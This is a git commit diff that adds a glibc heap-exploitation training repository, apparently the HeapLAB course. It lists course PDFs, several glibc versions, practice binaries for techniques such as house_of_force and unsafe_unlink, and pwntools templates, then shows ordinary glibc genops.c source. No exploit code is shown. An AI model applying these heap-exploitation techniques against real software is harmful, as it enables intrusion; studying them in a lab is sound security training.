commit ba02c1bd6981675aaf5a0b6cddb7457e53d5eed1
Author: Brett Weiland <techcrazybsw@gmail.com>
Date:   Mon Jan 4 16:32:01 2021 -0600

            new file:   HeapLAB+Bible.pdf
            new file:   HeapLAB/.glibc/glibc_2.23/ld-2.23.so
            new file:   HeapLAB/.glibc/glibc_2.23/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.23/libc-2.23.so
            new file:   HeapLAB/.glibc/glibc_2.23/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.23/libio/genops.c
            new file:   HeapLAB/.glibc/glibc_2.23/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld-2.23.so
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc-2.23.so
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libio/genops.c
            new file:   HeapLAB/.glibc/glibc_2.23_unsafe-unlink/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.24/ld-2.24.so
            new file:   HeapLAB/.glibc/glibc_2.24/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.24/libc-2.24.so
            new file:   HeapLAB/.glibc/glibc_2.24/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.24/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.25/ld-2.25.so
            new file:   HeapLAB/.glibc/glibc_2.25/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.25/libc-2.25.so
            new file:   HeapLAB/.glibc/glibc_2.25/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.25/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.26/ld-2.26.so
            new file:   HeapLAB/.glibc/glibc_2.26/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.26/libc-2.26.so
            new file:   HeapLAB/.glibc/glibc_2.26/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.26/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/ld-2.26.so
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/libc-2.26.so
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.26_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.27/ld-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.27/libc-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.27/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/ld-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/libc-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.27_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/ld-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/libc-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc-2.27.so
            new file:   HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.28/ld-2.28.so
            new file:   HeapLAB/.glibc/glibc_2.28/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.28/libc-2.28.so
            new file:   HeapLAB/.glibc/glibc_2.28/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.28/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/ld-2.28.so
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/libc-2.28.so
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.28_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.29/ld-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.29/libc-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.29/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/ld-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/libc-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.29_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/ld-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/libc-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc-2.29.so
            new file:   HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.30/ld-2.30.so
            new file:   HeapLAB/.glibc/glibc_2.30/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.30/libc-2.30.so
            new file:   HeapLAB/.glibc/glibc_2.30/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.30/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/ld-2.30.so
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/libc-2.30.so
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.30_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.31/ld-2.31.so
            new file:   HeapLAB/.glibc/glibc_2.31/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.31/libc-2.31.so
            new file:   HeapLAB/.glibc/glibc_2.31/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.31/malloc/malloc.c
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/ld-2.31.so
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/ld.so.2
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/libc-2.31.so
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/libc.so.6
            new file:   HeapLAB/.glibc/glibc_2.31_no-tcache/malloc/malloc.c
            new file:   HeapLAB/.src/demo_fastbins.c
            new file:   HeapLAB/.src/demo_top_chunk.c
            new file:   HeapLAB/.src/demo_unsortedbin.c
            new file:   HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf
            new file:   HeapLAB/challenge-fastbin_dup/.gdb_history
            new file:   HeapLAB/challenge-fastbin_dup/bruh.py
            new file:   HeapLAB/challenge-fastbin_dup/fastbin_dup_2
            new file:   HeapLAB/challenge-fastbin_dup/pwntools_template.py
            new file:   HeapLAB/challenge-one_byte/one_byte
            new file:   HeapLAB/challenge-one_byte/pwntools_template.py
            new file:   HeapLAB/fastbin_dup/demo
            new file:   HeapLAB/fastbin_dup/fastbin_dup
            new file:   HeapLAB/fastbin_dup/pwntools_template.py
            new file:   HeapLAB/house_of_force/demo
            new file:   HeapLAB/house_of_force/house_of_force
            new file:   HeapLAB/house_of_force/pwntools_template.py
            new file:   HeapLAB/house_of_orange/house_of_orange
            new file:   HeapLAB/house_of_orange/pwntools_template.py
            new file:   HeapLAB/malloc_testbed/.links/ld.so.2
            new file:   HeapLAB/malloc_testbed/.links/libc.so.6
            new file:   HeapLAB/malloc_testbed/change_glibc_version.py
            new file:   HeapLAB/malloc_testbed/malloc_testbed
            new file:   HeapLAB/malloc_testbed/pwntools_template.py
            new file:   HeapLAB/safe_unlink/pwntools_template.py
            new file:   HeapLAB/safe_unlink/safe_unlink
            new file:   HeapLAB/unsafe_unlink/demo
            new file:   HeapLAB/unsafe_unlink/pwntools_template.py
            new file:   HeapLAB/unsafe_unlink/unsafe_unlink
            new file:   original.gz

diff --git a/HeapLAB+Bible.pdf b/HeapLAB+Bible.pdf
new file mode 100644
index 0000000..c2b6381
Binary files /dev/null and b/HeapLAB+Bible.pdf differ
diff --git a/HeapLAB/.glibc/glibc_2.23/ld-2.23.so b/HeapLAB/.glibc/glibc_2.23/ld-2.23.so
new file mode 100755
index 0000000..dab711f
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.23/ld-2.23.so differ
diff --git a/HeapLAB/.glibc/glibc_2.23/ld.so.2 b/HeapLAB/.glibc/glibc_2.23/ld.so.2
new file mode 120000
index 0000000..6a23928
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23/ld.so.2
@@ -0,0 +1 @@
+ld-2.23.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.23/libc-2.23.so b/HeapLAB/.glibc/glibc_2.23/libc-2.23.so
new file mode 100755
index 0000000..f6e2889
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.23/libc-2.23.so differ
diff --git a/HeapLAB/.glibc/glibc_2.23/libc.so.6 b/HeapLAB/.glibc/glibc_2.23/libc.so.6
new file mode 120000
index 0000000..a42d666
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23/libc.so.6
@@ -0,0 +1 @@
+libc-2.23.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.23/libio/genops.c b/HeapLAB/.glibc/glibc_2.23/libio/genops.c
new file mode 100644
index 0000000..5803cbf
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23/libio/genops.c
@@ -0,0 +1,1253 @@
+/* Copyright (C) 1993-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public
+   License as published by the Free Software Foundation; either
+   version 2.1 of the License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; if not, see
+   <http://www.gnu.org/licenses/>.
+
+   As a special exception, if you link the code in this file with
+   files compiled with a GNU compiler to produce an executable,
+   that does not cause the resulting executable to be covered by
+   the GNU Lesser General Public License.  This exception does not
+   however invalidate any other reasons why the executable file
+   might be covered by the GNU Lesser General Public License.
+   This exception applies to code released by its copyright holders
+   in files containing the exception.  */
+
+/* Generic or default I/O operations. */
+
+#include "libioP.h"
+#include <stdlib.h>
+#include <string.h>
+#include <stdbool.h>
+#ifdef _LIBC
+#include <sched.h>
+#endif
+
+#ifdef _IO_MTSAFE_IO
+static _IO_lock_t list_all_lock = _IO_lock_initializer;
+#endif
+
+/* Used to signal modifications to the list of FILE decriptors.  */
+static int _IO_list_all_stamp;
+
+
+static _IO_FILE *run_fp;
+
+#ifdef _IO_MTSAFE_IO
+static void
+flush_cleanup (void *not_used)
+{
+  if (run_fp != NULL)
+    _IO_funlockfile (run_fp);
+  _IO_lock_unlock (list_all_lock);
+}
+#endif
+
+void
+_IO_un_link (struct _IO_FILE_plus *fp)
+{
+  if (fp->file._flags & _IO_LINKED)
+    {
+      struct _IO_FILE **f;
+#ifdef _IO_MTSAFE_IO
+      _IO_cleanup_region_start_noarg (flush_cleanup);
+      _IO_lock_lock (list_all_lock);
+      run_fp = (_IO_FILE *) fp;
+      _IO_flockfile ((_IO_FILE *) fp);
+#endif
+      if (_IO_list_all == NULL)
+	;
+      else if (fp == _IO_list_all)
+	{
+	  _IO_list_all = (struct _IO_FILE_plus *) _IO_list_all->file._chain;
+	  ++_IO_list_all_stamp;
+	}
+      else
+	for (f = &_IO_list_all->file._chain; *f; f = &(*f)->_chain)
+	  if (*f == (_IO_FILE *) fp)
+	    {
+	      *f = fp->file._chain;
+	      ++_IO_list_all_stamp;
+	      break;
+	    }
+      fp->file._flags &= ~_IO_LINKED;
+#ifdef _IO_MTSAFE_IO
+      _IO_funlockfile ((_IO_FILE *) fp);
+      run_fp = NULL;
+      _IO_lock_unlock (list_all_lock);
+      _IO_cleanup_region_end (0);
+#endif
+    }
+}
+libc_hidden_def (_IO_un_link)
+
+void
+_IO_link_in (struct _IO_FILE_plus *fp)
+{
+  if ((fp->file._flags & _IO_LINKED) == 0)
+    {
+      fp->file._flags |= _IO_LINKED;
+#ifdef _IO_MTSAFE_IO
+      _IO_cleanup_region_start_noarg (flush_cleanup);
+      _IO_lock_lock (list_all_lock);
+      run_fp = (_IO_FILE *) fp;
+      _IO_flockfile ((_IO_FILE *) fp);
+#endif
+      fp->file._chain = (_IO_FILE *) _IO_list_all;
+      _IO_list_all = fp;
+      ++_IO_list_all_stamp;
+#ifdef _IO_MTSAFE_IO
+      _IO_funlockfile ((_IO_FILE *) fp);
+      run_fp = NULL;
+      _IO_lock_unlock (list_all_lock);
+      _IO_cleanup_region_end (0);
+#endif
+    }
+}
+libc_hidden_def (_IO_link_in)
+
+/* Return minimum _pos markers
+   Assumes the current get area is the main get area. */
+_IO_ssize_t _IO_least_marker (_IO_FILE *fp, char *end_p);
+
+_IO_ssize_t
+_IO_least_marker (_IO_FILE *fp, char *end_p)
+{
+  _IO_ssize_t least_so_far = end_p - fp->_IO_read_base;
+  struct _IO_marker *mark;
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    if (mark->_pos < least_so_far)
+      least_so_far = mark->_pos;
+  return least_so_far;
+}
+
+/* Switch current get area from backup buffer to (start of) main get area. */
+
+void
+_IO_switch_to_main_get_area (_IO_FILE *fp)
+{
+  char *tmp;
+  fp->_flags &= ~_IO_IN_BACKUP;
+  /* Swap _IO_read_end and _IO_save_end. */
+  tmp = fp->_IO_read_end;
+  fp->_IO_read_end = fp->_IO_save_end;
+  fp->_IO_save_end= tmp;
+  /* Swap _IO_read_base and _IO_save_base. */
+  tmp = fp->_IO_read_base;
+  fp->_IO_read_base = fp->_IO_save_base;
+  fp->_IO_save_base = tmp;
+  /* Set _IO_read_ptr. */
+  fp->_IO_read_ptr = fp->_IO_read_base;
+}
+
+/* Switch current get area from main get area to (end of) backup area. */
+
+void
+_IO_switch_to_backup_area (_IO_FILE *fp)
+{
+  char *tmp;
+  fp->_flags |= _IO_IN_BACKUP;
+  /* Swap _IO_read_end and _IO_save_end. */
+  tmp = fp->_IO_read_end;
+  fp->_IO_read_end = fp->_IO_save_end;
+  fp->_IO_save_end = tmp;
+  /* Swap _IO_read_base and _IO_save_base. */
+  tmp = fp->_IO_read_base;
+  fp->_IO_read_base = fp->_IO_save_base;
+  fp->_IO_save_base = tmp;
+  /* Set _IO_read_ptr.  */
+  fp->_IO_read_ptr = fp->_IO_read_end;
+}
+
+int
+_IO_switch_to_get_mode (_IO_FILE *fp)
+{
+  if (fp->_IO_write_ptr > fp->_IO_write_base)
+    if (_IO_OVERFLOW (fp, EOF) == EOF)
+      return EOF;
+  if (_IO_in_backup (fp))
+    fp->_IO_read_base = fp->_IO_backup_base;
+  else
+    {
+      fp->_IO_read_base = fp->_IO_buf_base;
+      if (fp->_IO_write_ptr > fp->_IO_read_end)
+	fp->_IO_read_end = fp->_IO_write_ptr;
+    }
+  fp->_IO_read_ptr = fp->_IO_write_ptr;
+
+  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = fp->_IO_read_ptr;
+
+  fp->_flags &= ~_IO_CURRENTLY_PUTTING;
+  return 0;
+}
+libc_hidden_def (_IO_switch_to_get_mode)
+
+void
+_IO_free_backup_area (_IO_FILE *fp)
+{
+  if (_IO_in_backup (fp))
+    _IO_switch_to_main_get_area (fp);  /* Just in case. */
+  free (fp->_IO_save_base);
+  fp->_IO_save_base = NULL;
+  fp->_IO_save_end = NULL;
+  fp->_IO_backup_base = NULL;
+}
+libc_hidden_def (_IO_free_backup_area)
+
+#if 0
+int
+_IO_switch_to_put_mode (_IO_FILE *fp)
+{
+  fp->_IO_write_base = fp->_IO_read_ptr;
+  fp->_IO_write_ptr = fp->_IO_read_ptr;
+  /* Following is wrong if line- or un-buffered? */
+  fp->_IO_write_end = (fp->_flags & _IO_IN_BACKUP
+		       ? fp->_IO_read_end : fp->_IO_buf_end);
+
+  fp->_IO_read_ptr = fp->_IO_read_end;
+  fp->_IO_read_base = fp->_IO_read_end;
+
+  fp->_flags |= _IO_CURRENTLY_PUTTING;
+  return 0;
+}
+#endif
+
+int
+__overflow (_IO_FILE *f, int ch)
+{
+  /* This is a single-byte stream.  */
+  if (f->_mode == 0)
+    _IO_fwide (f, -1);
+  return _IO_OVERFLOW (f, ch);
+}
+libc_hidden_def (__overflow)
+
+static int save_for_backup (_IO_FILE *fp, char *end_p)
+#ifdef _LIBC
+     internal_function
+#endif
+     ;
+
+static int
+#ifdef _LIBC
+internal_function
+#endif
+save_for_backup (_IO_FILE *fp, char *end_p)
+{
+  /* Append [_IO_read_base..end_p] to backup area. */
+  _IO_ssize_t least_mark = _IO_least_marker (fp, end_p);
+  /* needed_size is how much space we need in the backup area. */
+  _IO_size_t needed_size = (end_p - fp->_IO_read_base) - least_mark;
+  /* FIXME: Dubious arithmetic if pointers are NULL */
+  _IO_size_t current_Bsize = fp->_IO_save_end - fp->_IO_save_base;
+  _IO_size_t avail; /* Extra space available for future expansion. */
+  _IO_ssize_t delta;
+  struct _IO_marker *mark;
+  if (needed_size > current_Bsize)
+    {
+      char *new_buffer;
+      avail = 100;
+      new_buffer = (char *) malloc (avail + needed_size);
+      if (new_buffer == NULL)
+	return EOF;		/* FIXME */
+      if (least_mark < 0)
+	{
+#ifdef _LIBC
+	  __mempcpy (__mempcpy (new_buffer + avail,
+				fp->_IO_save_end + least_mark,
+				-least_mark),
+		     fp->_IO_read_base,
+		     end_p - fp->_IO_read_base);
+#else
+	  memcpy (new_buffer + avail,
+		  fp->_IO_save_end + least_mark,
+		  -least_mark);
+	  memcpy (new_buffer + avail - least_mark,
+		  fp->_IO_read_base,
+		  end_p - fp->_IO_read_base);
+#endif
+	}
+      else
+	memcpy (new_buffer + avail,
+		fp->_IO_read_base + least_mark,
+		needed_size);
+      free (fp->_IO_save_base);
+      fp->_IO_save_base = new_buffer;
+      fp->_IO_save_end = new_buffer + avail + needed_size;
+    }
+  else
+    {
+      avail = current_Bsize - needed_size;
+      if (least_mark < 0)
+	{
+	  memmove (fp->_IO_save_base + avail,
+		   fp->_IO_save_end + least_mark,
+		   -least_mark);
+	  memcpy (fp->_IO_save_base + avail - least_mark,
+		  fp->_IO_read_base,
+		  end_p - fp->_IO_read_base);
+	}
+      else if (needed_size > 0)
+	memcpy (fp->_IO_save_base + avail,
+		fp->_IO_read_base + least_mark,
+		needed_size);
+    }
+  fp->_IO_backup_base = fp->_IO_save_base + avail;
+  /* Adjust all the streammarkers. */
+  delta = end_p - fp->_IO_read_base;
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    mark->_pos -= delta;
+  return 0;
+}
+
+int
+__underflow (_IO_FILE *fp)
+{
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
+    return EOF;
+#endif
+
+  if (fp->_mode == 0)
+    _IO_fwide (fp, -1);
+  if (_IO_in_put_mode (fp))
+    if (_IO_switch_to_get_mode (fp) == EOF)
+      return EOF;
+  if (fp->_IO_read_ptr < fp->_IO_read_end)
+    return *(unsigned char *) fp->_IO_read_ptr;
+  if (_IO_in_backup (fp))
+    {
+      _IO_switch_to_main_get_area (fp);
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	return *(unsigned char *) fp->_IO_read_ptr;
+    }
+  if (_IO_have_markers (fp))
+    {
+      if (save_for_backup (fp, fp->_IO_read_end))
+	return EOF;
+    }
+  else if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+  return _IO_UNDERFLOW (fp);
+}
+libc_hidden_def (__underflow)
+
+int
+__uflow (_IO_FILE *fp)
+{
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
+    return EOF;
+#endif
+
+  if (fp->_mode == 0)
+    _IO_fwide (fp, -1);
+  if (_IO_in_put_mode (fp))
+    if (_IO_switch_to_get_mode (fp) == EOF)
+      return EOF;
+  if (fp->_IO_read_ptr < fp->_IO_read_end)
+    return *(unsigned char *) fp->_IO_read_ptr++;
+  if (_IO_in_backup (fp))
+    {
+      _IO_switch_to_main_get_area (fp);
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	return *(unsigned char *) fp->_IO_read_ptr++;
+    }
+  if (_IO_have_markers (fp))
+    {
+      if (save_for_backup (fp, fp->_IO_read_end))
+	return EOF;
+    }
+  else if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+  return _IO_UFLOW (fp);
+}
+libc_hidden_def (__uflow)
+
+void
+_IO_setb (_IO_FILE *f, char *b, char *eb, int a)
+{
+  if (f->_IO_buf_base && !(f->_flags & _IO_USER_BUF))
+    free (f->_IO_buf_base);
+  f->_IO_buf_base = b;
+  f->_IO_buf_end = eb;
+  if (a)
+    f->_flags &= ~_IO_USER_BUF;
+  else
+    f->_flags |= _IO_USER_BUF;
+}
+libc_hidden_def (_IO_setb)
+
+void
+_IO_doallocbuf (_IO_FILE *fp)
+{
+  if (fp->_IO_buf_base)
+    return;
+  if (!(fp->_flags & _IO_UNBUFFERED) || fp->_mode > 0)
+    if (_IO_DOALLOCATE (fp) != EOF)
+      return;
+  _IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
+}
+libc_hidden_def (_IO_doallocbuf)
+
+int
+_IO_default_underflow (_IO_FILE *fp)
+{
+  return EOF;
+}
+
+int
+_IO_default_uflow (_IO_FILE *fp)
+{
+  int ch = _IO_UNDERFLOW (fp);
+  if (ch == EOF)
+    return EOF;
+  return *(unsigned char *) fp->_IO_read_ptr++;
+}
+libc_hidden_def (_IO_default_uflow)
+
+_IO_size_t
+_IO_default_xsputn (_IO_FILE *f, const void *data, _IO_size_t n)
+{
+  const char *s = (char *) data;
+  _IO_size_t more = n;
+  if (more <= 0)
+    return 0;
+  for (;;)
+    {
+      /* Space available. */
+      if (f->_IO_write_ptr < f->_IO_write_end)
+	{
+	  _IO_size_t count = f->_IO_write_end - f->_IO_write_ptr;
+	  if (count > more)
+	    count = more;
+	  if (count > 20)
+	    {
+#ifdef _LIBC
+	      f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
+#else
+	      memcpy (f->_IO_write_ptr, s, count);
+	      f->_IO_write_ptr += count;
+#endif
+	      s += count;
+	    }
+	  else if (count)
+	    {
+	      char *p = f->_IO_write_ptr;
+	      _IO_ssize_t i;
+	      for (i = count; --i >= 0; )
+		*p++ = *s++;
+	      f->_IO_write_ptr = p;
+	    }
+	  more -= count;
+	}
+      if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
+	break;
+      more--;
+    }
+  return n - more;
+}
+libc_hidden_def (_IO_default_xsputn)
+
+_IO_size_t
+_IO_sgetn (_IO_FILE *fp, void *data, _IO_size_t n)
+{
+  /* FIXME handle putback buffer here! */
+  return _IO_XSGETN (fp, data, n);
+}
+libc_hidden_def (_IO_sgetn)
+
+_IO_size_t
+_IO_default_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)
+{
+  _IO_size_t more = n;
+  char *s = (char*) data;
+  for (;;)
+    {
+      /* Data available. */
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	{
+	  _IO_size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
+	  if (count > more)
+	    count = more;
+	  if (count > 20)
+	    {
+#ifdef _LIBC
+	      s = __mempcpy (s, fp->_IO_read_ptr, count);
+#else
+	      memcpy (s, fp->_IO_read_ptr, count);
+	      s += count;
+#endif
+	      fp->_IO_read_ptr += count;
+	    }
+	  else if (count)
+	    {
+	      char *p = fp->_IO_read_ptr;
+	      int i = (int) count;
+	      while (--i >= 0)
+		*s++ = *p++;
+	      fp->_IO_read_ptr = p;
+	    }
+	    more -= count;
+	}
+      if (more == 0 || __underflow (fp) == EOF)
+	break;
+    }
+  return n - more;
+}
+libc_hidden_def (_IO_default_xsgetn)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_sync (_IO_FILE *fp)
+{
+  return 0;
+}
+#endif
+
+_IO_FILE *
+_IO_default_setbuf (_IO_FILE *fp, char *p, _IO_ssize_t len)
+{
+    if (_IO_SYNC (fp) == EOF)
+	return NULL;
+    if (p == NULL || len == 0)
+      {
+	fp->_flags |= _IO_UNBUFFERED;
+	_IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
+      }
+    else
+      {
+	fp->_flags &= ~_IO_UNBUFFERED;
+	_IO_setb (fp, p, p+len, 0);
+      }
+    fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = 0;
+    fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_read_end = 0;
+    return fp;
+}
+
+_IO_off64_t
+_IO_default_seekpos (_IO_FILE *fp, _IO_off64_t pos, int mode)
+{
+  return _IO_SEEKOFF (fp, pos, 0, mode);
+}
+
+int
+_IO_default_doallocate (_IO_FILE *fp)
+{
+  char *buf;
+
+  buf = malloc(_IO_BUFSIZ);
+  if (__glibc_unlikely (buf == NULL))
+    return EOF;
+
+  _IO_setb (fp, buf, buf+_IO_BUFSIZ, 1);
+  return 1;
+}
+libc_hidden_def (_IO_default_doallocate)
+
+void
+_IO_init (_IO_FILE *fp, int flags)
+{
+  _IO_no_init (fp, flags, -1, NULL, NULL);
+}
+libc_hidden_def (_IO_init)
+
+void
+_IO_old_init (_IO_FILE *fp, int flags)
+{
+  fp->_flags = _IO_MAGIC|flags;
+  fp->_flags2 = 0;
+  fp->_IO_buf_base = NULL;
+  fp->_IO_buf_end = NULL;
+  fp->_IO_read_base = NULL;
+  fp->_IO_read_ptr = NULL;
+  fp->_IO_read_end = NULL;
+  fp->_IO_write_base = NULL;
+  fp->_IO_write_ptr = NULL;
+  fp->_IO_write_end = NULL;
+  fp->_chain = NULL; /* Not necessary. */
+
+  fp->_IO_save_base = NULL;
+  fp->_IO_backup_base = NULL;
+  fp->_IO_save_end = NULL;
+  fp->_markers = NULL;
+  fp->_cur_column = 0;
+#if _IO_JUMPS_OFFSET
+  fp->_vtable_offset = 0;
+#endif
+#ifdef _IO_MTSAFE_IO
+  if (fp->_lock != NULL)
+    _IO_lock_init (*fp->_lock);
+#endif
+}
+
+void
+_IO_no_init (_IO_FILE *fp, int flags, int orientation,
+	     struct _IO_wide_data *wd, const struct _IO_jump_t *jmp)
+{
+  _IO_old_init (fp, flags);
+  fp->_mode = orientation;
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (orientation >= 0)
+    {
+      fp->_wide_data = wd;
+      fp->_wide_data->_IO_buf_base = NULL;
+      fp->_wide_data->_IO_buf_end = NULL;
+      fp->_wide_data->_IO_read_base = NULL;
+      fp->_wide_data->_IO_read_ptr = NULL;
+      fp->_wide_data->_IO_read_end = NULL;
+      fp->_wide_data->_IO_write_base = NULL;
+      fp->_wide_data->_IO_write_ptr = NULL;
+      fp->_wide_data->_IO_write_end = NULL;
+      fp->_wide_data->_IO_save_base = NULL;
+      fp->_wide_data->_IO_backup_base = NULL;
+      fp->_wide_data->_IO_save_end = NULL;
+
+      fp->_wide_data->_wide_vtable = jmp;
+    }
+  else
+    /* Cause predictable crash when a wide function is called on a byte
+       stream.  */
+    fp->_wide_data = (struct _IO_wide_data *) -1L;
+#endif
+  fp->_freeres_list = NULL;
+}
+
+int
+_IO_default_sync (_IO_FILE *fp)
+{
+  return 0;
+}
+
+/* The way the C++ classes are mapped into the C functions in the
+   current implementation, this function can get called twice! */
+
+void
+_IO_default_finish (_IO_FILE *fp, int dummy)
+{
+  struct _IO_marker *mark;
+  if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))
+    {
+      free (fp->_IO_buf_base);
+      fp->_IO_buf_base = fp->_IO_buf_end = NULL;
+    }
+
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    mark->_sbuf = NULL;
+
+  if (fp->_IO_save_base)
+    {
+      free (fp->_IO_save_base);
+      fp->_IO_save_base = NULL;
+    }
+
+  _IO_un_link ((struct _IO_FILE_plus *) fp);
+
+#ifdef _IO_MTSAFE_IO
+  if (fp->_lock != NULL)
+    _IO_lock_fini (*fp->_lock);
+#endif
+}
+libc_hidden_def (_IO_default_finish)
+
+_IO_off64_t
+_IO_default_seekoff (_IO_FILE *fp, _IO_off64_t offset, int dir, int mode)
+{
+  return _IO_pos_BAD;
+}
+
+int
+_IO_sputbackc (_IO_FILE *fp, int c)
+{
+  int result;
+
+  if (fp->_IO_read_ptr > fp->_IO_read_base
+      && (unsigned char)fp->_IO_read_ptr[-1] == (unsigned char)c)
+    {
+      fp->_IO_read_ptr--;
+      result = (unsigned char) c;
+    }
+  else
+    result = _IO_PBACKFAIL (fp, c);
+
